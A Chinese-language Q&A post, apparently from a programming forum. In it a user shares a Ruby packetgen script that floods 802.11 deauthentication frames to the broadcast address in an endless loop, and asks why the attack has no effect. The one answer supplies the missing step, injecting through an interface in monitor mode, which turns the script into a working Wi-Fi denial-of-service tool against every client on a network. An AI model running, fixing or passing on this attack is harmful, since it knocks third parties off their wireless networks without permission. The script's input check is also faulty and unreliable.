我正在尝试编写一个简单的解除认证攻击脚本,但当我启动 wireshark 而不是解除认证帧时,我只看到以太网 II 帧;此外,这些帧对我的任何网络设备都没有影响。是因为我以混杂模式使用 wireshark,还是我的网络配置或脚本存在问题。代码如下,屏幕截图位于我在 stack overflow 上提出的类似问题的链接中这里。
require 'packetgen'
def deauth()
network = 'wlp2s0'
yes = 'y'
no = 'n'
broadcast = 'FF:FF:FF:FF:FF:FF'
print 'Do you want to deauth network?[y/n]'
input = gets.chomp
if input == yes or yes.upcase!
puts 'Deauthing all network clients...'
while true
PacketGen.gen('Dot11::Management', mac1: broadcast).
add('Dot11::DeAuth').
to_w(network)
end
elsif input == no or no.upcase!
print 'Okay :('
end
end
deauth()
答案1
确保将数据包注入处于 802.11 监控模式的接口。否则,接口将假定您正在注入 802.3 有线以太网数据包并按此方式处理它们。